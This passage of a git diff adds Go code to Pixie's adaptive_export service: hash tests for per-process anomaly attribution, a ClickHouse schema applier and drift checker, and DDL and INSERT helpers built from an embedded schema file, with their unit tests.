b/src/vizier/services/adaptive_export/internal/anomaly/hash_test.go new file mode 100644 index 00000000000..dfdd8cd7d92 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/anomaly/hash_test.go @@ -0,0 +1,110 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package anomaly + +import "testing" + +// canonical fixture: redis CVE-2025-49844 R1005 alert (workload identity only). +var canonicalTarget = Target{ + PID: 106040, + Comm: "redis-server", + Pod: "redis-578d5dc9bd-kjj78", + Namespace: "redis", +} + +// TestHash_Deterministic — same Target hashes identically every call.
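+// Determinism is also what lets a consumer re-derive the key with no
+// stored mapping (a hypothetical sketch, not code from this change):
+//
+//	h := Hash(Target{PID: pid, Comm: comm, Pod: pod, Namespace: ns})
+//	// h is stable across restarts, so it can be compared directly
+//	// against rehydrated forensic_db.adaptive_attribution rows.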
+func TestHash_Deterministic(t *testing.T) { + a := Hash(canonicalTarget) + b := Hash(canonicalTarget) + if a != b { + t.Fatalf("not deterministic: %q vs %q", a, b) + } + if got := len(a); got != 32 { + t.Fatalf("len %d, want 32 hex chars", got) + } +} + +// TestHash_DiffersOnPID — two processes on the same pod still hash differently +// (we want PER-process attribution). +func TestHash_DiffersOnPID(t *testing.T) { + other := canonicalTarget + other.PID = canonicalTarget.PID + 1 + if Hash(canonicalTarget) == Hash(other) { + t.Fatalf("collision on PID change") + } +} + +// TestHash_DiffersOnComm — different comm under same PID/pod/ns must differ. +func TestHash_DiffersOnComm(t *testing.T) { + other := canonicalTarget + other.Comm = "redis-cli" + if Hash(canonicalTarget) == Hash(other) { + t.Fatalf("collision on Comm change") + } +} + +// TestHash_DiffersOnPod — different replicas of same workload differ. +func TestHash_DiffersOnPod(t *testing.T) { + other := canonicalTarget + other.Pod = "redis-578d5dc9bd-OTHER" + if Hash(canonicalTarget) == Hash(other) { + t.Fatalf("collision on Pod change") + } +} + +// TestHash_DiffersOnNamespace — same pod name in different ns must differ. +func TestHash_DiffersOnNamespace(t *testing.T) { + other := canonicalTarget + other.Namespace = "redis-staging" + if Hash(canonicalTarget) == Hash(other) { + t.Fatalf("collision on Namespace change") + } +} + +// TestHash_AllowsEmptyPod — host-pid processes have no pod/namespace. +// Hash must still be computable and stable. +func TestHash_AllowsEmptyPod(t *testing.T) { + host := Target{PID: 1, Comm: "systemd"} + a := Hash(host) + b := Hash(host) + if a != b { + t.Fatalf("empty-pod hash not deterministic") + } + if len(a) != 32 { + t.Fatalf("empty-pod hash len %d", len(a)) + } + // empty-pod target must collide with itself but not with the + // non-empty-pod canonical target. + if a == Hash(canonicalTarget) { + t.Fatalf("empty-pod hash collides with named-pod hash") + } +} + +// TestHash_NoTimestampInfluence — verifies the hash function takes only +// the four identity fields. (No EventTime / RuleID parameter exists.) +// This is a structural test: the Target struct has exactly 4 fields, +// all part of the canonical form. If you add a field, you must decide +// whether it belongs in the hash and update this test. +func TestHash_NoTimestampInfluence(t *testing.T) { + // The unkeyed composite literal below fails to compile if Target + // gains or loses a field. When that happens, decide: + // new field belongs in the hash → add to canonical form and here; + // new field does NOT belong → leave Target unchanged, add a sibling type. + a := Target{1, "x", "p", "n"} // unkeyed on purpose: enforces the 4-field shape + if Hash(a) != Hash(Target{PID: 1, Comm: "x", Pod: "p", Namespace: "n"}) { + t.Fatalf("Target hash leaks an unrecognised field") + } +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/BUILD.bazel b/src/vizier/services/adaptive_export/internal/clickhouse/BUILD.bazel new file mode 100644 index 00000000000..e421ccc3586 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/BUILD.bazel @@ -0,0 +1,40 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "clickhouse", + srcs = [ + "apply.go", + "ddl.go", + "insert.go", + ], + embedsrcs = ["schema.sql"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], +) + +pl_go_test( + name = "clickhouse_test", + srcs = [ + "apply_test.go", + "ddl_test.go", + "insert_test.go", + ], + embed = [":clickhouse"], +) diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/apply.go b/src/vizier/services/adaptive_export/internal/clickhouse/apply.go new file mode 100644 index 00000000000..aba0b4a7ab0 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/apply.go @@ -0,0 +1,232 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package clickhouse + +import ( + "bytes" + "context" + "encoding/json" + "fmt" + "io" + "net/http" + "net/url" + "strings" + "time" +) + +// OperatorOwnedTables is the subset of KnownTables the adaptive_export +// operator creates on boot. Kubescape tables (alerts, kubescape_logs) +// are NOT here — they are owned by the soc/tree/clickhouse-lab +// installer. Order matters: adaptive_attribution last so it does not +// reference any pixie table during creation (it does not, but the +// invariant is cheap to keep). +var OperatorOwnedTables = []string{ + // 12 pixie socket_tracer tables — created BEFORE Pixie's retention + // plugin gets a chance to auto-DDL them (which would omit our + // namespace + pod columns and break analyst JOINs). + "http_events", + "http2_messages.beta", + "dns_events", + "redis_events", + "mysql_events", + "pgsql_events", + "cql_events", + "mongodb_events", + "kafka_events.beta", + "amqp_events", + "mux_events", + "tls_events", + // operator's only write target. + "adaptive_attribution", +} + +// Applier applies operator-owned DDL to a ClickHouse cluster over the +// HTTP interface (default 8123). Used at boot. +type Applier struct { + endpoint string + user string + pass string + client *http.Client +} + +// NewApplier validates the endpoint and returns a ready Applier. 
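+//
+// A boot-time sketch (hypothetical wiring; the endpoint value is an
+// assumption, not a default this package supplies):
+//
+//	a, err := NewApplier("http://clickhouse:8123", user, pass)
+//	if err != nil {
+//		log.Fatal(err)
+//	}
+//	if err := a.Apply(ctx); err != nil {
+//		log.Fatal(err) // schema apply is a boot precondition
+//	}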
+func NewApplier(endpoint, user, pass string) (*Applier, error) { + if endpoint == "" { + return nil, fmt.Errorf("clickhouse: empty endpoint") + } + if _, err := url.Parse(endpoint); err != nil { + return nil, fmt.Errorf("clickhouse: invalid endpoint %q: %w", endpoint, err) + } + return &Applier{ + endpoint: strings.TrimRight(endpoint, "/"), + user: user, + pass: pass, + client: &http.Client{Timeout: 30 * time.Second}, + }, nil +} + +// Apply ensures forensic_db exists, then runs CREATE TABLE IF NOT +// EXISTS for every OperatorOwnedTables entry in declared order. +// Idempotent. Returns the first error encountered without continuing — +// callers should treat schema apply as a precondition for the rest of +// boot. +func (a *Applier) Apply(ctx context.Context) error { + if err := a.execute(ctx, "CREATE DATABASE IF NOT EXISTS forensic_db"); err != nil { + return fmt.Errorf("apply: create database forensic_db: %w", err) + } + for _, table := range OperatorOwnedTables { + ddl, err := DDL(table) + if err != nil { + return fmt.Errorf("apply: get DDL for %s: %w", table, err) + } + if err := a.execute(ctx, ddl); err != nil { + return fmt.Errorf("apply: create %s: %w", table, err) + } + } + return nil +} + +// execute POSTs a single DDL statement to ClickHouse via the HTTP +// query endpoint. Non-2xx responses surface as Go errors. +func (a *Applier) execute(ctx context.Context, sql string) error { + req, err := http.NewRequestWithContext(ctx, http.MethodPost, + a.endpoint+"/", strings.NewReader(sql)) + if err != nil { + return err + } + if a.user != "" { + req.SetBasicAuth(a.user, a.pass) + } + resp, err := a.client.Do(req) + if err != nil { + return err + } + defer resp.Body.Close() + if resp.StatusCode/100 != 2 { + body, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) + return fmt.Errorf("HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(body))) + } + return nil +} + +// SchemaDriftError is returned by VerifyPixieSchema when a pixie +// observation table is missing one or more of the operator-required +// columns. errors.Is-friendly. +type SchemaDriftError struct { + Table string + Missing []string +} + +func (e *SchemaDriftError) Error() string { + return fmt.Sprintf("clickhouse: pixie table %q schema drift, missing columns: %s", + e.Table, strings.Join(e.Missing, ", ")) +} + +// requiredPixieColumns are the columns every pixie observation table +// MUST have for adaptive_attribution JOINs to work. namespace + pod are +// our additions over Pixie's auto-DDL; hostname + time_ are Pixie's own +// canonical columns we depend on. +var requiredPixieColumns = []string{"namespace", "pod", "hostname", "time_"} + +// VerifyPixieSchema queries system.columns for each pixie observation +// table and confirms the operator-required columns are present. Used +// as a defensive guard against Pixie's retention plugin having +// auto-created a table BEFORE our Apply ran (e.g., operator was +// installed onto a cluster where the plugin had already been running +// with its own minimal DDL). +// +// Returns the FIRST drift detected as *SchemaDriftError. Callers +// usually want to log loudly and refuse to start so the misconfig +// is visible — silently continuing leaves the table with a schema +// the analyst-side JOINs can't cope with. 
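+//
+// A caller-side sketch (hypothetical handling, following the
+// fail-fast advice above):
+//
+//	var drift *SchemaDriftError
+//	if err := a.VerifyPixieSchema(ctx); errors.As(err, &drift) {
+//		log.Fatalf("pixie table %s missing %v; refusing to start",
+//			drift.Table, drift.Missing)
+//	} else if err != nil {
+//		log.Fatal(err)
+//	}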
+func (a *Applier) VerifyPixieSchema(ctx context.Context) error { + for _, table := range PixieTables() { + cols, err := a.tableColumns(ctx, table) + if err != nil { + return fmt.Errorf("verify %s: %w", table, err) + } + var missing []string + for _, want := range requiredPixieColumns { + if !contains(cols, want) { + missing = append(missing, want) + } + } + if len(missing) > 0 { + return &SchemaDriftError{Table: table, Missing: missing} + } + } + return nil +} + +// tableColumns lists the column names of forensic_db.<table>
as +// reported by system.columns. +func (a *Applier) tableColumns(ctx context.Context, table string) ([]string, error) { + q := url.Values{} + q.Set("query", fmt.Sprintf( + "SELECT name FROM system.columns WHERE database='forensic_db' AND table=%s FORMAT JSONEachRow", + quoteCH(table))) + req, err := http.NewRequestWithContext(ctx, http.MethodGet, a.endpoint+"/?"+q.Encode(), nil) + if err != nil { + return nil, err + } + if a.user != "" { + req.SetBasicAuth(a.user, a.pass) + } + resp, err := a.client.Do(req) + if err != nil { + return nil, err + } + defer resp.Body.Close() + if resp.StatusCode/100 != 2 { + body, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) + return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(body))) + } + body, err := io.ReadAll(resp.Body) + if err != nil { + return nil, err + } + type row struct { + Name string `json:"name"` + } + var out []string + for _, line := range bytes.Split(body, []byte{'\n'}) { + line = bytes.TrimSpace(line) + if len(line) == 0 { + continue + } + var r row + if err := json.Unmarshal(line, &r); err != nil { + return nil, fmt.Errorf("parse system.columns row: %w", err) + } + out = append(out, r.Name) + } + return out, nil +} + +func quoteCH(s string) string { + r := strings.NewReplacer(`\`, `\\`, `'`, `\'`).Replace(s) + return "'" + r + "'" +} + +func contains(s []string, x string) bool { + for _, v := range s { + if v == x { + return true + } + } + return false +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go new file mode 100644 index 00000000000..b37764ac6a4 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/apply_test.go @@ -0,0 +1,184 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package clickhouse + +import ( + "context" + "errors" + "io" + "net/http" + "net/http/httptest" + "strings" + "sync" + "testing" +) + +// TestApply_ExecutesEveryOperatorOwnedTable — Apply POSTs one DDL per +// table in OperatorOwnedTables, in order. None of the kubescape tables +// (alerts, kubescape_logs) are touched — those belong to the soc installer. +func TestApply_ExecutesEveryOperatorOwnedTable(t *testing.T) { + var mu sync.Mutex + var bodies []string + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + b, _ := io.ReadAll(r.Body) + mu.Lock() + bodies = append(bodies, string(b)) + mu.Unlock() + w.WriteHeader(200) + })) + defer srv.Close() + a, err := NewApplier(srv.URL, "", "") + if err != nil { + t.Fatalf("NewApplier: %v", err) + } + if err := a.Apply(context.Background()); err != nil { + t.Fatalf("Apply: %v", err) + } + // 1 CREATE DATABASE + len(OperatorOwnedTables) CREATE TABLE calls. 
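+ // (With the current 13-entry OperatorOwnedTables that is 14 calls:
+ // the database, then the 12 pixie tables, then adaptive_attribution.)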
+ if got, want := len(bodies), len(OperatorOwnedTables)+1; got != want { + t.Fatalf("Apply made %d calls, want %d", got, want) + } + if !strings.Contains(bodies[0], "CREATE DATABASE IF NOT EXISTS forensic_db") { + t.Fatalf("first DDL must create the database; got: %s", bodies[0]) + } + // Spot-check that the SECOND call is for the first OperatorOwnedTables entry, + // and that the LAST call is for adaptive_attribution. + if !strings.Contains(bodies[1], "forensic_db."+OperatorOwnedTables[0]) { + t.Fatalf("second DDL not for %s; got: %s", OperatorOwnedTables[0], bodies[1]) + } + if !strings.Contains(bodies[len(bodies)-1], "forensic_db.adaptive_attribution") { + t.Fatalf("last DDL not for adaptive_attribution; got: %s", bodies[len(bodies)-1]) + } + // And ensure no kubescape DDL leaked through. + for _, b := range bodies { + if strings.Contains(b, "forensic_db.alerts") || strings.Contains(b, "forensic_db.kubescape_logs") { + t.Fatalf("operator's Apply must not create kubescape tables; got:\n%s", b) + } + } +} + +// TestApply_FailsFastOnHTTPError — if any CREATE returns non-2xx, +// Apply returns immediately without attempting later tables. +func TestApply_FailsFastOnHTTPError(t *testing.T) { + var calls int + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + calls++ + if calls == 1 { + w.WriteHeader(500) + _, _ = w.Write([]byte("ddl exploded")) + return + } + w.WriteHeader(200) + })) + defer srv.Close() + a, _ := NewApplier(srv.URL, "", "") + err := a.Apply(context.Background()) + if err == nil { + t.Fatalf("expected error from Apply on HTTP 500") + } + if calls != 1 { + t.Fatalf("Apply continued past first failure; calls = %d", calls) + } +} + +// TestVerifyPixieSchema_DetectsMissingColumns — defensive guard: +// if a pixie table lacks namespace or pod (because Pixie's plugin +// auto-created it before our Apply), VerifyPixieSchema returns +// SchemaDriftError naming the table and the missing columns. +func TestVerifyPixieSchema_DetectsMissingColumns(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + q := r.URL.Query().Get("query") + // First pixie table → respond with FULL column list (well-formed). + // Subsequent pixie tables → respond with a column list missing namespace + pod + // (simulating Pixie's auto-DDL having created them earlier). + if strings.Contains(q, "table='http_events'") { + _, _ = w.Write([]byte(`{"name":"time_"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"upid"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"namespace"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"pod"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"hostname"}` + "\n")) + return + } + // every other pixie table responds as if auto-created by Pixie without our columns. + _, _ = w.Write([]byte(`{"name":"time_"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"upid"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"hostname"}` + "\n")) + })) + defer srv.Close() + a, _ := NewApplier(srv.URL, "", "") + err := a.VerifyPixieSchema(context.Background()) + if err == nil { + t.Fatalf("expected SchemaDriftError; got nil") + } + var drift *SchemaDriftError + if !errors.As(err, &drift) { + t.Fatalf("err type = %T, want *SchemaDriftError", err) + } + if drift.Table != "http2_messages.beta" { + // pixie tables iterated in PixieTables() order; first one missing should + // be http2_messages.beta (the second entry).
+ t.Fatalf("first drift = %q, want http2_messages.beta", drift.Table) + } + if !contains(drift.Missing, "namespace") || !contains(drift.Missing, "pod") { + t.Fatalf("Missing should include namespace + pod; got %v", drift.Missing) + } +} + +// TestVerifyPixieSchema_AllPresent — happy path: all expected columns +// present on every pixie table. +func TestVerifyPixieSchema_AllPresent(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + _, _ = w.Write([]byte(`{"name":"time_"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"upid"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"namespace"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"pod"}` + "\n")) + _, _ = w.Write([]byte(`{"name":"hostname"}` + "\n")) + })) + defer srv.Close() + a, _ := NewApplier(srv.URL, "", "") + if err := a.VerifyPixieSchema(context.Background()); err != nil { + t.Fatalf("VerifyPixieSchema: %v", err) + } +} + +// TestNewApplier_RejectsBadEndpoint — defensive contract. +func TestNewApplier_RejectsBadEndpoint(t *testing.T) { + if _, err := NewApplier("", "", ""); err == nil { + t.Fatalf("empty endpoint not rejected") + } + if _, err := NewApplier("http://%zz", "", ""); err == nil { + t.Fatalf("malformed endpoint not rejected") + } +} + +// TestOperatorOwnedTables_DoesNotIncludeKubescape — structural guard: +// the operator never owns kubescape tables. +func TestOperatorOwnedTables_DoesNotIncludeKubescape(t *testing.T) { + for _, x := range []string{"alerts", "kubescape_logs"} { + if contains(OperatorOwnedTables, x) { + t.Fatalf("%q must not be in OperatorOwnedTables (it belongs to the soc installer)", x) + } + } +} + +// TestOperatorOwnedTables_LastIsAdaptiveAttribution — ordering guard. +func TestOperatorOwnedTables_LastIsAdaptiveAttribution(t *testing.T) { + last := OperatorOwnedTables[len(OperatorOwnedTables)-1] + if last != "adaptive_attribution" { + t.Fatalf("last entry = %q, want adaptive_attribution", last) + } +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go b/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go new file mode 100644 index 00000000000..582c7783b7b --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/ddl.go @@ -0,0 +1,117 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package clickhouse owns the canonical ClickHouse DDL for the +// forensic_db tables that adaptive_export reads (kubescape_logs) and +// the 12 socket_tracer tables Pixie's retention plugin writes (which +// the operator joins against via forensic_db.adaptive_attribution). +// +// schema.sql is the single source of truth. The operator never invents +// SQL — it always extracts statements verbatim from the embedded copy.
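+//
+// A minimal extraction sketch (hypothetical caller):
+//
+//	ddl, err := DDL("redis_events") // full "CREATE TABLE ... ;" statement
+//	if err != nil {
+//		// only ErrUnknownTable or a malformed-schema error lands here
+//	}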
+package clickhouse + +import ( + _ "embed" + "errors" + "fmt" + "strings" +) + +//go:embed schema.sql +var canonicalSchema string + +// KnownTables enumerates every forensic_db table the operator is aware +// of, in the order they appear in schema.sql. Backtick-quoted table +// names (those containing dots, e.g. "http2_messages.beta") are listed +// here without backticks; DDL() reinjects them. +var KnownTables = []string{ + // non-pixie + "alerts", + "kubescape_logs", + // 12 socket_tracer pixie observation tables + "http_events", + "http2_messages.beta", + "dns_events", + "redis_events", + "mysql_events", + "pgsql_events", + "cql_events", + "mongodb_events", + "kafka_events.beta", + "amqp_events", + "mux_events", + "tls_events", + // operator-owned attribution table + "adaptive_attribution", +} + +// ErrUnknownTable is returned by DDL / Columns when asked for a table +// not in KnownTables. +var ErrUnknownTable = errors.New("clickhouse: unknown table") + +// DDL returns the canonical CREATE TABLE statement for the named table, +// extracted from the embedded schema.sql. +func DDL(table string) (string, error) { + if !isKnown(table) { + return "", fmt.Errorf("%w: %q", ErrUnknownTable, table) + } + // ClickHouse identifiers containing a dot must be backtick-quoted. + // Build the right header for the lookup. + identifier := table + if strings.Contains(table, ".") { + identifier = "`" + table + "`" + } + header := "CREATE TABLE IF NOT EXISTS forensic_db." + identifier + start := strings.Index(canonicalSchema, header) + if start < 0 { + return "", fmt.Errorf("%w: %q registered in KnownTables but not present in embedded schema.sql", ErrUnknownTable, table) + } + rest := canonicalSchema[start:] + semi := strings.Index(rest, ";") + if semi < 0 { + return "", fmt.Errorf("malformed schema.sql: no terminating ';' after %q", table) + } + return rest[:semi+1], nil +} + +// PixieTables returns the subset of KnownTables that are pixie +// socket_tracer observation tables (the JOIN targets for +// adaptive_attribution). +func PixieTables() []string { + return []string{ + "http_events", + "http2_messages.beta", + "dns_events", + "redis_events", + "mysql_events", + "pgsql_events", + "cql_events", + "mongodb_events", + "kafka_events.beta", + "amqp_events", + "mux_events", + "tls_events", + } +} + +func isKnown(name string) bool { + for _, t := range KnownTables { + if t == name { + return true + } + } + return false +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/ddl_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/ddl_test.go new file mode 100644 index 00000000000..c9a0e6c26fc --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/ddl_test.go @@ -0,0 +1,142 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License.
+// +// SPDX-License-Identifier: Apache-2.0 + +package clickhouse + +import ( + "errors" + "strings" + "testing" +) + +// TestDDL_ReturnsCanonicalForKnownTables — every table named in +// KnownTables can be extracted as a complete CREATE TABLE statement. +func TestDDL_ReturnsCanonicalForKnownTables(t *testing.T) { + for _, name := range KnownTables { + t.Run(name, func(t *testing.T) { + ddl, err := DDL(name) + if err != nil { + t.Fatalf("DDL(%q): %v", name, err) + } + if !strings.HasPrefix(ddl, "CREATE TABLE IF NOT EXISTS forensic_db.") { + t.Fatalf("DDL(%q) wrong prefix: %q", name, ddl[:minInt(70, len(ddl))]) + } + if !strings.HasSuffix(ddl, ";") { + t.Fatalf("DDL(%q) does not terminate with ';'", name) + } + }) + } +} + +// TestDDL_PixieTablesIncludeNamespaceAndPod — every pixie table must +// declare namespace + pod columns (used by attribution JOINs). +func TestDDL_PixieTablesIncludeNamespaceAndPod(t *testing.T) { + for _, name := range PixieTables() { + t.Run(name, func(t *testing.T) { + ddl, err := DDL(name) + if err != nil { + t.Fatalf("DDL(%q): %v", name, err) + } + if !strings.Contains(ddl, "namespace") { + t.Fatalf("%s missing namespace column", name) + } + if !strings.Contains(ddl, "pod") { + t.Fatalf("%s missing pod column", name) + } + }) + } +} + +// TestDDL_PixieTables_NoAnomalyHashColumn — pixie observation tables +// MUST NOT carry the hash inline; attribution is via JOIN. +func TestDDL_PixieTables_NoAnomalyHashColumn(t *testing.T) { + for _, name := range PixieTables() { + t.Run(name, func(t *testing.T) { + ddl, err := DDL(name) + if err != nil { + t.Fatalf("DDL(%q): %v", name, err) + } + if strings.Contains(ddl, "anomaly_hash") || strings.Contains(ddl, "anomaly_hashes") { + t.Fatalf("pixie table %q must not carry anomaly_hash column; got:\n%s", name, ddl) + } + }) + } +} + +// TestDDL_AdaptiveAttribution_HasExpectedColumns — the attribution +// table is the operator's only write target. +func TestDDL_AdaptiveAttribution_HasExpectedColumns(t *testing.T) { + ddl, err := DDL("adaptive_attribution") + if err != nil { + t.Fatalf("DDL: %v", err) + } + for _, c := range []string{ + "anomaly_hash", "namespace", "pod", "comm", "pid", + "hostname", "t_start", "t_end", "last_seen", + } { + if !strings.Contains(ddl, c) { + t.Fatalf("adaptive_attribution missing column %q; got:\n%s", c, ddl) + } + } + if !strings.Contains(ddl, "ReplacingMergeTree(t_end)") { + t.Fatalf("adaptive_attribution must use ReplacingMergeTree(t_end); got:\n%s", ddl) + } +} + +// TestDDL_KubescapeLogs_PreservesAnomalyHash — kubescape_logs keeps its +// existing anomaly_hash DEFAULT '' column for pipeline compat. +func TestDDL_KubescapeLogs_PreservesAnomalyHash(t *testing.T) { + ddl, err := DDL("kubescape_logs") + if err != nil { + t.Fatalf("DDL: %v", err) + } + if !strings.Contains(ddl, "anomaly_hash") { + t.Fatalf("kubescape_logs lost anomaly_hash column: %s", ddl) + } +} + +// TestDDL_UnknownTable_ErrUnknownTable — defensive contract. +func TestDDL_UnknownTable_ErrUnknownTable(t *testing.T) { + for _, bad := range []string{"", "no_such_table", "process_events", "conn_stats"} { + _, err := DDL(bad) + if !errors.Is(err, ErrUnknownTable) { + t.Fatalf("DDL(%q) → %v, want ErrUnknownTable", bad, err) + } + } +} + +// TestDDL_DottedTableName_BacktickQuoted — schema.sql backtick-quotes +// dotted ClickHouse identifiers.
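+// e.g. the embedded schema declares forensic_db.`http2_messages.beta`,
+// and DDL() must hand that statement back with the backticks intact.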
+func TestDDL_DottedTableName_BacktickQuoted(t *testing.T) { + for _, name := range []string{"http2_messages.beta", "kafka_events.beta"} { + t.Run(name, func(t *testing.T) { + ddl, err := DDL(name) + if err != nil { + t.Fatalf("DDL(%q): %v", name, err) + } + if !strings.Contains(ddl, "`"+name+"`") { + t.Fatalf("dotted table %q must be backtick-quoted; got:\n%s", name, ddl) + } + }) + } +} + +func minInt(a, b int) int { + if a < b { + return a + } + return b +} diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/insert.go b/src/vizier/services/adaptive_export/internal/clickhouse/insert.go new file mode 100644 index 00000000000..1d76c286760 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/clickhouse/insert.go @@ -0,0 +1,114 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package clickhouse + +import ( + "fmt" + "strings" +) + +// Columns returns the column names of forensic_db.
<table> in +// declaration order, parsed from the embedded canonical schema.sql. +// Same defensive contract as DDL: unknown table → ErrUnknownTable. +func Columns(table string) ([]string, error) { + ddl, err := DDL(table) + if err != nil { + return nil, err + } + return parseColumnList(ddl) +} + +// InsertSQL returns the parameterized INSERT for forensic_db.<table>
, +// ending in "... VALUES" so a driver's batch API can append rows. +// Column order matches Columns() exactly — callers MUST append values +// in that same order. Dotted ClickHouse identifiers are auto-quoted +// with backticks. +func InsertSQL(table string) (string, error) { + cols, err := Columns(table) + if err != nil { + return "", err + } + identifier := table + if strings.Contains(table, ".") { + identifier = "`" + table + "`" + } + return fmt.Sprintf("INSERT INTO forensic_db.%s (%s) VALUES", + identifier, strings.Join(cols, ", ")), nil +} + +// parseColumnList walks the body of a CREATE TABLE statement, returning +// the leading identifier of each non-comment, non-blank line up to the +// closing `)` that ends the column list. Defensive against the SQL +// dialect quirks present in our schema (LowCardinality(...), DEFAULT +// expressions, inline -- comments, multi-word types). +func parseColumnList(ddl string) ([]string, error) { + open := strings.Index(ddl, "(") + if open < 0 { + return nil, fmt.Errorf("malformed DDL: no opening paren") + } + body := ddl[open+1:] + // the closing paren of the column list is the first `)` at the + // matching depth, but our schema doesn't nest parens inside the + // column list except inside DEFAULT exprs (e.g. now64(3)) and + // LowCardinality(String). Track depth. + depth := 1 + end := -1 + for i, r := range body { + switch r { + case '(': + depth++ + case ')': + depth-- + if depth == 0 { + end = i + } + } + if end >= 0 { + break + } + } + if end < 0 { + return nil, fmt.Errorf("malformed DDL: no closing paren for column list") + } + body = body[:end] + + var cols []string + for _, raw := range strings.Split(body, "\n") { + line := strings.TrimSpace(raw) + if line == "" || strings.HasPrefix(line, "--") { + continue + } + // strip trailing comma + inline -- comment + if i := strings.Index(line, "--"); i >= 0 { + line = strings.TrimSpace(line[:i]) + } + line = strings.TrimSuffix(line, ",") + if line == "" { + continue + } + // first whitespace-separated token = column name + fields := strings.Fields(line) + if len(fields) == 0 { + continue + } + cols = append(cols, fields[0]) + } + if len(cols) == 0 { + return nil, fmt.Errorf("malformed DDL: no columns parsed") + } + return cols, nil +} diff --git 